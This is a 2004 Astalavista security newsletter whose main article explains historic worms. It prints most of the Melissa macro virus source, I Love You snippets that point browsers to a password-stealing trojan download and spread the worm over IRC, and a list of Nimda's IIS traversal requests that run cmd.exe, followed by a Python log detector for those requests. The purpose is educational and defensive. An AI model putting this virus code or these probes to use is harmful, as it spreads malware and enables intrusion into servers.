|------------------------------------------|
|- Astalavista Group Security Newsletter -|
|- Issue 4 24 February 2004 -|
|- http://www.astalavista.com/ -|
|- security@astalavista.net -|
|------------------------------------------|

- Table of contents -

[01] Introduction
[02] Security News
     - Will computing be more secure in 2004?
     - Lamo pleads guilty to Times hack
     - Feds seek wiretap access via VoIP
     - MyDoom worm hits the net
     - Belgian police arrest female virus coder Gigabyte
[03] Astalavista Recommends
     - Breaking into computer networks from the Internet
[04] Site of the Month
     - ReactOS.com
[05] Free Security Consultation
     - With the appearance of MyDoom...
     - Hello guys, I'm confused...
     - What is the worst scenario...
[06] Enterprise Security Issues
     - Known Malware Exploits Explained
[07] Home Users Security Issues
     - Malicious Software (Malware) - How To Protect Myself
[08] Meet the Security Scene
     - Interview with an anonymous malware coder
[09] Security Sites Review
     - CCMostWanted.com
     - Security-Forums.com
     - RootPrompt.org
[10] Astalavista needs YOU!
[11] Special Promotions
     - Astalavista.net
[12] Final Words


01. Introduction
------------

Dear Subscribers,

Welcome to Issue 4 of Astalavista's Security Newsletter!

Did you enjoy your holidays? At Astalavista we did, but we also spent a great deal of time working on the new face of Astalavista.com that everyone keeps mailing us about. Thanks for the nice recommendations; we keep them in mind and have already started working with several contributors who proposed major changes to the portal. So what's new? Astalavista.com is turning into a daily updated, dynamic and resourceful security portal; our newsletter's subscribers now number more than 22,000; and we are about to launch several new sections at the site. We're sure you're going to enjoy them the way you enjoy the renovated Astalavista.com. In Issue 4 we're emphasizing the malware problem because of the recent appearance of the MyDoom worm.
You're also going to read an interesting interview with a malware coder who preferred to stay anonymous. Enjoy!

We would like to hear from you! What do you think about Astalavista.com? What is your opinion of the Security Newsletter? Mail us at security@astalavista.net

Meanwhile, take a look at Astalavista's newest flash movie:
http://www.mediaplantage.ch/intro.swf

Previous issues of Astalavista's Security Newsletter can be found at:
http://astalavista.com/index.php?section=newsletter

Editor - Dancho Danchev
dancho@astalavista.net

Proofreader - Yordanka Ilieva
danny@astalavista.net


02. Security News
-------------

The security world is a complex one. Every day a new vulnerability is found, new tools are released, new countermeasures are devised and implemented, and so on. In such a fast-moving scene we have decided to provide you with the most interesting and up-to-date security news of the month, in a centralized section that also carries our personal comments on each issue discussed.

Your comments and suggestions about this section are welcome at security@astalavista.net

-------------

[ WILL COMPUTING BE MORE SECURE IN 2004? ]

Peter H. Gregory, Computerworld columnist, has written an article discussing the major security threats and his view of their importance in 2004.
More information can be found at:
http://www.pcworld.com/news/article/0,aid,114066,00.asp

Astalavista's Comments:
Availability and increased productivity have always come at a price in terms of security. Each new technology, no matter how useful, brings a large number of security issues with it. 2004 is predicted to be one of the toughest years yet for the information security industry: companies and analysts expect the "superworm", the most devastating and destructive worm created so far; cyberterrorism activities are believed to increase as well; another issue that deserves a lot of attention is the coordination of terrorist groups over the Internet using steganography, or sometimes even plain-text discussions. Overall, Peter H. Gregory has covered the major trends in the IS industry for 2004. Vigilance and education are what can minimize the damage.

[ LAMO PLEADS GUILTY TO TIMES HACK ]

Hacker Adrian Lamo pleaded guilty on Thursday to federal computer crime charges arising from his 2002 intrusion into the New York Times' internal network, and faces a likely six to twelve months in custody when he is sentenced in April.

More info can be found at:
http://securityfocus.com/printable/news/7771
http://www.securityfocus.com/news/340

Astalavista's Comments:
Bad news for Lamo, who seems to be capable. But have you ever asked yourself what happens when you offer to fix a critical vulnerability in a company whose systems you have recently been trying to exploit, and the company refuses? This is where it ends up.

[ FEDS SEEK WIRETAP ACCESS VIA VOIP ]

The FBI and the Justice Department have renewed their efforts to wiretap voice conversations carried across the Internet.
More info can be found at:
http://news.com.com/2100-7352_3-5137344.html

Astalavista's Comments:
I doubt the FBI will be the only agency taking advantage of VoIP wiretapping; it will definitely give the NSA the ability to proactively monitor large VoIP networks, and, yes, they have the computing power.

[ MYDOOM WORM HITS THE NET ]

Another worm is in the wild, this time targeting SCO's and Microsoft's web servers. Current analyses of the worm and the monitored effects of its infections worldwide show that it is spreading very fast, hitting millions of users. The second version of the worm even blocks anti-virus software updates and the user's ability to visit security-related sites (it rewrites the Windows hosts file so that those sites no longer resolve), cutting off the information needed to remove it. What is interesting to point out is that the worm relies entirely on people's naivety: the e-mail uses random subjects and generic bodies, and it may arrive from a known address, probably someone who has been infected as well. Read the e-mail, then open the attachment, nothing personal...

More info can be found at:
http://astalavista.com/?section=news&cmd=details&newsid=19
http://www.frame4.com/php/article1718.html
http://www.frame4.com/php/modules.php?name=News&file=article&sid=1739
http://www.securitynewsportal.com/cgi-bin/cgi-script/csNews/csNews.cgi?command=viewone&id=58&database=JanDD%2edb
http://www.securitynewsportal.com/cgi-bin/cgi-script/csNews/csNews.cgi?command=viewone&id=59&database=JanDD%2edb
http://www.securitynewsportal.com/cgi-bin/cgi-script/csNews/csNews.cgi?command=viewone&id=66&database=JanDD%2edb

Astalavista's Comments:
SCO was successfully hit; the first version of the worm did its work, which means that the number of users still unaware of the dangers posed by malware isn't changing. Out of every ten messages in your inbox, how many carried the MyDoom worm?
[ BELGIAN POLICE ARREST FEMALE HACKER GIGABYTE ]

Belgian police arrested a 19-year-old female technology student who gained international notoriety for creating computer viruses.

More info can be found at:
http://www.securityfocus.com/news/8048

Astalavista's Comment:
How do you expect to have female geeks when you bust them? Gigabyte's biggest mistake was her publicly known image as a "female hacker"; too much publicity in this case isn't good, and she got busted just as MyDoom appeared...


03. Astalavista Recommends
----------------------

This section is unique in its idea and the information included within. Its purpose is to provide you with direct links to various white papers covering many aspects of information security. These white papers are defined as a "must read" for everyone interested in deepening his or her knowledge of the security field. The section will keep growing with every new issue. Your comments and suggestions about the section are welcome at security@astalavista.net

" THE STANDARD OF GOOD PRACTICE FOR INFORMATION SECURITY "

The Information Security Forum recently released this paper, developed over the years and distributed among its members. Its 240 pages discuss the major security threats organizations and companies face every day, as well as ways to implement and control countermeasures. Read this one!
http://www.frame4.com/exchange/standard.pdf

" SECURING AND OPTIMIZING LINUX - REDHAT EDITION "

Still haven't read this one?! It's extremely comprehensive and covers almost everything as far as securing a Linux box (particularly one running Red Hat Linux) is concerned: general security, firewall configuration, SSH configuration, Tripwire use, Sendmail, DNS and web server security, all in this 486-page document.
http://www.frame4.com/exchange/secure-linux.pdf

" WHAT IS INFORMATION WARFARE "

Written in 1995 by Martin C. Libicki of the National Defense University, it provides the reader with the most comprehensive explanation of each of the seven (7) types of information warfare.
http://www.frame4.com/exchange/warfare.pdf

" INTRUSION DETECTION SYSTEMS AND COMPUTER FORENSICS "

A detailed presentation about the use of IDSs in computer forensics; it will also give you an extended overview of everything you need to know about IDSs.
http://www.frame4.com/exchange/ids-forensics.pdf

" AN INTRODUCTION TO CYBERNETICS "

From the book's preface: "Many workers in the biological sciences - physiologists, psychologists, sociologists - are interested in cybernetics and would like to apply its methods and techniques to their own speciality. Many have, however, been prevented from taking up the subject by an impression that its use must be preceded by a long study of electronics and advanced pure mathematics; for they have formed the impression that cybernetics and these subjects are inseparable."
http://www.frame4.com/exchange/cybernetics.pdf


04. Site of the Month
----------------

ReactOS is an open source effort to develop a high-quality operating system that is compatible with Windows NT applications and drivers.

More info is available at:
http://www.reactOS.com/


05. Free Security Consultation
--------------------------

Have you ever had a security-related question but weren't sure where to direct it? This is what the "Free Security Consultation" section was created for. Due to the high number of security-related e-mails we keep getting on a daily basis, we have decided to start a free service and offer it to our subscribers. Whenever you have a security-related question, direct it to us, and within 48 hours you will receive a qualified response from one of our security experts. The questions we consider most interesting and useful will be published in this section. Neither your e-mail address nor your name will appear anywhere.
Direct all of your security questions to security@astalavista.net

We were pleasantly surprised by the number of this month's security-related questions. Thanks a lot for your interest in this free security service; we are doing our best to respond as soon as possible and provide you with accurate answers to your questions.

---------
Question:
With the appearance of MyDoom, I've started having concerns about how protected my office computers are. We have seven computers; all of them have the commercial version of ZoneAlarm installed and anti-virus scanners on each of the computers, plus the gateway anti-virus scanner offered by our web hosting provider.

---------
Answer:
As far as protection from the outside is concerned, the measures you have in place are reasonable for the small office network that you have. This, of course, doesn't mean that malware couldn't enter your network; something else you should seriously consider evaluating is your staff members' awareness of viruses, trojans and worms. Do they know how to protect themselves by not opening an attachment they received, even when it comes from a friend? Peer-to-peer software and access should be blocked as well; since a lot of malware spreads through these, your staff is again exposed to a possible infection.

--------
Question:
Hello guys. I'm confused. I believe I can take care of the security of my computer, but I cannot do anything when a friend who has my e-mail address in his or her address book gets infected with a worm that distributes itself using my e-mail address. As a result, I'm getting quite a lot of e-mails from anti-virus scanners that have blocked my e-mails, and e-mails from postmasters telling me that I'm infected with a worm.
--------
Answer:
A personal recommendation to all the admins out there: in times of worms spreading around, please turn off the gateway anti-virus notification that is sent when a virus is discovered in a message :-) Worms forge the sender address, so the notification goes to someone who was never infected. You can't control who adds your e-mail address to his or her address book, the same way you can't control which spammer adds your address to a mailing database. If you are that serious about your friends' security, provide them with articles about protection against malware, with the idea of educating them.

--------
Question:
What is the worst-case scenario as far as these worms are concerned?

--------
Answer:
I'm sure every security expert, or even a computer enthusiast, can point out at least five possible scenarios, but consider the following one: what would be the impact of a worm spreading faster than Slammer, which scanned billions of IP addresses and infected most of its vulnerable targets within about fifteen minutes, combined with the destructive payload of the CIH virus?


06. Enterprise Security Issues
--------------------------

In today's world of high-speed communications, of companies relying completely on the Internet for doing business and increasing productivity, we have decided that there should be a special section for corporate security, where advanced and highly interesting topics will be discussed in order to provide that audience with what they are looking for: knowledge!

In this issue, we've included an article contributed by Abhishek Bhuyan. It gives an overview of the most common malware released so far; comments on its source code are included as well.

Known Malware Exploits Explained
by Abhishek Bhuyan
http://www.lucky-web.net/

Intruders who access networks and systems without authorization, or insiders with malicious motives, can plant various types of programs to cause damage to the network.
These programs are often lumped together under the general term "viruses", although there are other varieties, and together they have cost companies and individuals billions of dollars in lost data, lost productivity, and the time and expense of recovery. Some of the more destructive examples of malicious code, also referred to as malware (MALicious softWARE), over the past decade are:

- CIH/Chernobyl -

In the late 1990s, this virus caused a great deal of damage to business and home computer users. It infected executable files and was spread by running an infected file on a Windows 95/98 machine. There were several variants of CIH; these were "time bomb" viruses that were activated on a predefined date (either April 26, the anniversary of the Chernobyl disaster, or the 26th of every month). Until the trigger date, the virus remained dormant. Once the computer's internal clock indicated the activation date, the virus would overwrite the first 2048 sectors (the first megabyte) of every hard disk in the computer, thus wiping out the file allocation table and causing the hard disk to appear to be erased. However, the data on the rest of the disk could be recovered using data recovery software; many users were unaware of this. The virus also attempted to overwrite the basic input/output system (BIOS) flash memory, rendering the computer unbootable. (This did not work on computers whose BIOS had been set to prevent writes.) This virus started to show up again in the spring of 2002, piggybacking on the Klez virus.

- Melissa -

This was the first virus to be widely disseminated via e-mail, starting in March 1999. It is a macro virus, written in Visual Basic for Applications (VBA) and embedded in a Microsoft Word 97/2000 document. When the infected document is opened, the macro runs (unless Word is set not to run macros), sending itself to the first 50 entries in every Microsoft Outlook MAPI address book.
These include mailing list addresses, which could result in very rapid propagation of the virus. The virus also made changes to the Normal.dot template, which caused newly created Word documents to be infected. Because of the huge volume of mail it produced, the virus caused a denial of service (DoS) on some e-mail servers. The confessed author of the virus, David Smith, was sentenced to 20 months in federal prison and fined $5,000.

- Code Red -

In the summer of 2001, this self-propagating worm began to infect web servers running Internet Information Server (IIS). On various trigger dates, the infected machine would try to connect to TCP port 80 (used for web services) on computers with randomly selected IP addresses. When successful, it attempted to infect the remote systems. Some variants also defaced web pages stored on the server. On other dates, the infected machine would launch a DoS attack against a specific IP address embedded in the code. CERT reported that Code Red infected over 250,000 systems over the course of nine hours on July 19, 2001.

- Nimda -

In the late summer of 2001, the Nimda worm infected numerous computers running Windows 95/98/ME, NT and 2000. The worm made changes to web documents and executable files on the infected systems and created multiple copies of itself. It spread via e-mail, via network shares, and through visits to infected web sites. It also exploited vulnerabilities in IIS versions 4 and 5 and spread from client machines to web servers through the back doors left by the Code Red II worm. Nimda thus allowed attackers to execute arbitrary commands on unpatched IIS machines, and the worm's scanning activity caused DoS conditions on the networks it hit.

- Klez -

In late 2001 and early 2002, this e-mail worm spread throughout the Internet.
It propagates through mass mailings and exploits a vulnerability in unpatched versions of the Outlook and Outlook Express mail clients, attempting to run when the message containing it is merely previewed. When it runs, it copies itself to the System or System32 folder in the system root directory and modifies a registry key so that it is executed when Windows starts. It also tries to disable any virus scanners and sends copies of itself to addresses in the Windows address book, in the form of a random filename with a double extension (for example, file.doc.exe). The payload executes on the 13th day of every other month, starting with January, resulting in files on local and mapped drives being truncated to 0 bytes.

Now I'm going to explain the three most popular pieces of malware: some of the tricks these worms used, but NOT how the whole code worked or how to write malware that exploits them. I'm not that much of a genius :-)

"Melissa", "I Love You" and "Nimda" Worms

- Melissa Worm -

Melissa and I Love You had a widespread impact on computer systems that was borderline chaotic, and the associated damage estimate (nearly $8 billion) is borderline absurd. What made these worms so effective? Both Melissa and I Love You used the victim's address book as the next round of victims. Since the source of the e-mail appears to be someone you know, a certain "trust" is established that causes the recipients to let their guard down.

Melissa is actually a fairly simple and small macro virus. In an effort to show how simple a worm can be, let's go through exactly what Melissa comprises:

    Private Sub Document_Open()
    On Error Resume Next

Melissa works by infecting the Document_Open() macro of Microsoft Word files. Any code placed in the Document_Open() routine is run immediately when the user opens the Word file. That said, Melissa propagates by users opening infected documents, which are typically attached to an e-mail.
    If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
        CommandBars("Macro").Controls("Security...").Enabled = False
        System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
    Else
        CommandBars("Tools").Controls("Macro").Enabled = False
        Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
    End If

Here Melissa makes an intelligent move: it disables the macro security features of Microsoft Word. On Word 2000 (Office 9.0, recognizable by the presence of the Security key) it sets the macro security level to 1 (Low) and greys out the Tools > Macro > Security... menu item; on Word 97 it removes the Tools > Macro menu entry and switches off the built-in virus protection as well as the conversion and Normal.dot save prompts. This allows it to continue unhampered and avoids alerting the end user that anything is going on.

    Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
    Set UngaDasOutlook = CreateObject("Outlook.Application")
    Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")

Messaging API (MAPI) is a way for Windows applications to interface with various e-mail functions (usually provided by Microsoft Outlook, but other MAPI-compliant e-mail packages are available).

    If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Then

Melissa includes a failsafe, i.e. it has a way to tell if it has already run on, or "infected", this host. For Melissa in particular, this is the preceding registry value being set to the indicated string. At this point, if the value is not set, Melissa has not yet run and goes on to execute its primary payload.
    If UngaDasOutlook = "Outlook" Then
        DasMapiName.Logon "profile", "password"
        For y = 1 To DasMapiName.AddressLists.Count
            Set AddyBook = DasMapiName.AddressLists(y)
            x = 1
            Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
            For oo = 1 To AddyBook.AddressEntries.Count
                Peep = AddyBook.AddressEntries(x)
                BreakUmOffASlice.Recipients.Add Peep
                x = x + 1
                If x > 50 Then oo = AddyBook.AddressEntries.Count
            Next oo

Here we see Melissa checking that the mail application really is Microsoft Outlook and, if so, composing for each of the user's address lists a message addressed to the first 50 entries found in it.

            BreakUmOffASlice.Subject = "Important Message From " & Application.UserName
            BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)"
            BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
            BreakUmOffASlice.Send

This is the code that actually sends the e-mail to the 50 addresses previously found. You can see the subject, which is personalized using the victim's name. You can also see that Melissa simply attaches itself (the active document) to the e-mail in one line, and then one more command sends the message.

            Peep = ""
        Next y
        DasMapiName.Logoff
    End If
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo"
    End If

Finally, the sending is wrapped up, and to make sure it does not keep sending all these e-mails, Melissa sets the failsafe by creating the registry value that is checked for earlier in the code.
    Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
    Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
    NTCL = NTI1.CodeModule.CountOfLines
    ADCL = ADI1.CodeModule.CountOfLines
    BGN = 2
    If ADI1.Name <> "Melissa" Then
        If ADCL > 0 Then ADI1.CodeModule.DeleteLines 1, ADCL
        Set ToInfect = ADI1
        ADI1.Name = "Melissa"
        DoAD = True
    End If
    If NTI1.Name <> "Melissa" Then
        If NTCL > 0 Then NTI1.CodeModule.DeleteLines 1, NTCL
        Set ToInfect = NTI1
        NTI1.Name = "Melissa"
        DoNT = True
    End If
    If DoNT <> True And DoAD <> True Then GoTo CYA

Here Melissa checks whether the active document and the document template (Normal.dot) are already infected (their first code module is named "Melissa"); if both are, it jumps down to the exit code ("GoTo CYA"). If one of them is not, it wipes that module's existing code and infects it:

    If DoNT = True Then
        Do While ADI1.CodeModule.Lines(1, 1) = ""
            ADI1.CodeModule.DeleteLines 1
        Loop
        ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
        Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
            ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
            BGN = BGN + 1
        Loop
    End If
    If DoAD = True Then
        Do While NTI1.CodeModule.Lines(1, 1) = ""
            NTI1.CodeModule.DeleteLines 1
        Loop
        ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
        Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
            ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
            BGN = BGN + 1
        Loop
    End If

The document infection code. Here we see Melissa copying itself line by line from the infected side to the clean one: into a Document_Open() routine of the active document when the infection comes from Normal.dot, and into a Document_Close() routine of Normal.dot when the infection comes from the active document. The latter means that every new document created from the template will run the Melissa code when it is closed or saved.

    CYA:
    If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then
        ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
    ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
        ActiveDocument.Saved = True
    End If

Here Melissa finishes by saving the current active document, making sure a copy of itself has been successfully stored.
    'WORD/Melissa written by Kwyjibo
    'Works in both Word 2000 and Word 97
    'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
    'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!
    If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here."
    End Sub

The visible payload is a joke: whenever the day of the month equals the current minute, the Scrabble quote is typed into the open document.

- I Love You Worm -

The I Love You virus is a little more bulky, so I chose not to include the entire script here. You can download the complete I Love You source from:
http://www.packetstormsecurity.org/viral-db/love-letter-source.txt

What is interesting to note about the I Love You virus is that it randomly changed the user's default web browser home page to one of four locations, as seen here in the code:

    num = Int((4 * Rnd) + 1)
    if num = 1 then
        regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
    elseif num = 2 then
        regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
    elseif num = 3 then
        regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe"
    elseif num = 4 then
        regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe"
    end if
    end if  ' closes an enclosing condition that is not reproduced in this excerpt

The WIN-BUGSFIX.exe turned out to be a Trojan application designed to steal passwords. Now, a quick look shows that all of the URLs are on www.skyinet.net. This resulted in many places simply blocking access to that single host. While bad for skyinet.net, it was an easy fix for administrators.
Imagine if the virus creator had used more popular hosting sites, such as the members' home pages on aol.com, or even made references to large sites such as yahoo.com and hotmail.com; would administrators have rushed to block those sites as well? Perhaps not. Also, had someone at skyinet.net been smart, they would have replaced the Trojan WIN-BUGSFIX.exe with an application that disinfected the system of the I Love You virus. That is, if administrators had allowed infected machines to download the "Trojaned Trojan".

I Love You also modifies the configuration files for mIRC, a popular Windows IRC chat client:

    if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then
        set scriptini=fso.CreateTextFile(folderspec&"\script.ini")
        scriptini.WriteLine "[script]"
        scriptini.WriteLine ";mIRC Script"
        scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will"
        scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks"
        scriptini.WriteLine ";"
        scriptini.WriteLine ";Khaled Mardam-Bey"
        scriptini.WriteLine ";http://www.mirc.com"
        scriptini.WriteLine ";"
        scriptini.WriteLine "n0=on 1:JOIN:#:{"
        scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
        scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
        scriptini.WriteLine "n3=}"
        scriptini.close
    end if

Here we see I Love You making a change that causes the user's IRC client to DCC-send a copy of the I Love You virus to every person who joins a channel the user is in. Of course, the filename has to be enticing to the users joining the channel, so that they are tempted to open the file.

- Nimda Worm -

The coolest one! In September 2001 a very nasty worm reared its ugly head. The Nimda worm (just reverse "nimda" and you get "admin"), also called the Concept virus, was another worm that propagated between Windows hosts. Nimda featured multiple methods of infecting a host. First, it could send itself via e-mail.
It would attach itself as an encoded .exe file, but would use an audio/x-wave Multipurpose Internet Mail Extensions (MIME) type, which triggered a bug in Internet Explorer's MIME handling (used by Outlook and Outlook Express to render HTML mail) that automatically executed the attachment when the e-mail was merely previewed. Once the attachment was executed, the worm would send itself to people in the user's address book as well as to e-mail addresses found on web pages in Internet Explorer's cache; that is, the worm would actually harvest e-mail addresses from recently browsed web pages!

The worm would scan for vulnerable IIS machines, looking for the root.exe files left over from the Code Red II and sadmind/IIS worms, as well as using various Unicode and double-encoding URL tricks in order to execute commands on the server. The following is the list of requests made by the worm (sequences such as \xc1\x1c denote the raw bytes the worm sent URL-encoded, for example %c1%1c, which unpatched IIS decoded to a backslash):

    GET /scripts/root.exe?/c+dir
    GET /c/winnt/system32/cmd.exe?/c+dir
    GET /d/winnt/system32/cmd.exe?/c+dir
    GET /MSADC/root.exe?/c+dir
    GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
    GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
    GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir
    GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir
    GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir
    GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
    GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
    GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir
    GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
    GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
    GET /msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/system32/cmd.exe?/c+dir

Once the worm found a vulnerable IIS server, it would attempt to transfer the worm code to the target with the Trivial File Transfer Protocol (TFTP). It would also modify the server by adding the Guest account (enabling it if it already existed) to the Administrators group, and it would create a Windows share of the C: drive (using the name C$).
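The request list above is what a Nimda probe looks like in a web server log, and the encoding tricks in it are the reason naive string matching misses variants. The Python below is an added example, not part of this article or of the Nimda analyses it cites: it decodes each request path the lenient way unpatched IIS did (two rounds of percent-decoding, then folding the overlong UTF-8 sequences %c0%af, %c1%1c and %c1%9c onto the slash and backslash they stood for) and only then looks for directory traversal towards a command interpreter. The log lines are constructed for the example in common log format; where the list above shows raw bytes (\xc1\x1c, %5c), the sample uses the URL-encoded forms the worm actually transmitted (%c1%1c, %255c).

```python
"""Flag Nimda / Code Red style IIS probes in web server log lines.

Added example for this article; the log lines below are constructed, not
captured traffic.
"""
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote_to_bytes

# Common log format: the request line sits between the first pair of quotes.
REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')

# Both worms ultimately ask the server for a command interpreter.
SHELL_TARGETS = ("cmd.exe", "root.exe")


def fold_overlong_utf8(raw: bytes) -> bytes:
    """Decode the invalid 2-byte UTF-8 sequences the worm relied on.

    A lead byte of 0xC0/0xC1 can only start an overlong encoding of an ASCII
    character, which a strict decoder rejects. Unpatched IIS accepted it, so
    %c0%af became '/' and %c1%1c (or %c1%9c) became '\\'. Mirroring that here
    makes the traversal visible.
    """
    out = bytearray()
    i = 0
    while i < len(raw):
        b = raw[i]
        if b in (0xC0, 0xC1) and i + 1 < len(raw):
            out.append(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F))
            i += 2
        else:
            out.append(b)
            i += 1
    return bytes(out)


def normalize(path: str, rounds: int = 2) -> str:
    """Canonicalize a request path: percent-decode twice (so %255c -> %5c -> '\\'
    and %%35c -> %5c -> '\\'), fold overlong UTF-8, unify slashes, lowercase."""
    raw = path.encode("latin-1", "replace")
    for _ in range(rounds):
        raw = unquote_to_bytes(raw)
    raw = fold_overlong_utf8(raw).replace(b"\\", b"/")
    return raw.decode("latin-1").lower()


def classify(path: str) -> Optional[str]:
    """Label a request path, or return None when it looks benign."""
    norm_path = normalize(path).partition("?")[0]   # the worm's command lives in the query
    traversal = ".." in norm_path.split("/")
    wants_shell = norm_path.endswith(SHELL_TARGETS)
    if wants_shell and traversal:
        return "traversal-to-shell"      # Unicode / double-decode exploit attempt
    if wants_shell:
        return "shell-request"           # root.exe backdoor, or a drive mapped as a vdir
    if traversal:
        return "traversal"
    return None


def scan_log(lines: List[str]) -> List[Tuple[str, str]]:
    """Return (raw_path, label) for every suspicious request in the log."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if m:
            label = classify(m.group(1))
            if label:
                hits.append((m.group(1), label))
    return hits


# Constructed sample log (common log format): benign requests mixed with the
# worm's probes in the URL-encoded form they travel in on the wire.
SAMPLE_LOG = [
    '10.0.0.5 - - [18/Sep/2001:13:21:07 +0000] "GET /index.html HTTP/1.0" 200 1043',
    '10.0.0.5 - - [18/Sep/2001:13:21:08 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 325',
    '10.0.0.5 - - [18/Sep/2001:13:21:08 +0000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325',
    '10.0.0.5 - - [18/Sep/2001:13:21:09 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325',
    '10.0.0.5 - - [18/Sep/2001:13:21:09 +0000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325',
    '10.0.0.5 - - [18/Sep/2001:13:21:10 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325',
    '10.0.0.5 - - [18/Sep/2001:13:21:10 +0000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325',
    '10.0.0.9 - - [18/Sep/2001:13:22:00 +0000] "GET /images/logo.gif HTTP/1.0" 200 2211',
]

if __name__ == "__main__":
    for raw_path, label in scan_log(SAMPLE_LOG):
        print(f"{label:20s} {raw_path}  ->  {normalize(raw_path)}")
```

The point of normalizing before matching is that every encoded variant collapses to the same canonical path, so one rule (".." followed by a command interpreter) covers the whole list; matching the literal strings would need one rule per encoding and would still miss the next one.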
All local Hypertext Markup Language (HTML) and Active Server Pages (ASP) files would be modified to include a short JavaScript snippet (not reproduced in this article) that opened the worm's copy of itself, readme.eml, in a new browser window. In addition, the worm would copy itself to the readme.eml file. The final result was that unsuspecting web surfers would automatically download, and possibly execute, the worm from an infected web site.

The worm copies itself into .EML and .NWS files in various local and network directories. If an unsuspecting user uses Windows Explorer to browse a directory containing these files, it is possible that the automatic preview function of Explorer would execute the worm. This allowed the worm to propagate over file shares on a local network.

The worm also copies itself to riched20.dll, the rich edit control library that Word and WordPad load from the current directory, which is an attempt to Trojan Microsoft Office documents: documents opened in the same directory as the planted riched20.dll will load and execute the Trojan DLL.

The end result was a noisy but very effective worm. It was noisy because it created many .EML and .NWS files on the local system. It also modified web pages on the web site, which made it easy to remotely detect a compromised server. But the multiple infection methods proved quite effective, and many people who had run through and removed the worm found that their systems kept getting infected; it is a tough worm to fully eradicate! To properly combat it, the security administrator needed to patch the IIS server, upgrade the Microsoft Outlook client (and the Internet Explorer build behind it, which provided the vulnerable MIME handling), and be cautious when browsing network shares.

Full information on the Nimda worm is available in the SecurityFocus analysis:
http://aris.securityfocus.com/alerts/nimda/010921-Analysis-Nimda-v2.pdf

Some tips on prevention and response:
---------------------------------------------

Protecting systems and networks from the damage caused by Trojan horses, viruses and worms is mostly a matter of common sense.
Practices that can help prevent infection include the following:

- Do not run executable (.EXE) files from unknown sources, including those attached to an e-mail or downloaded from Web sites.
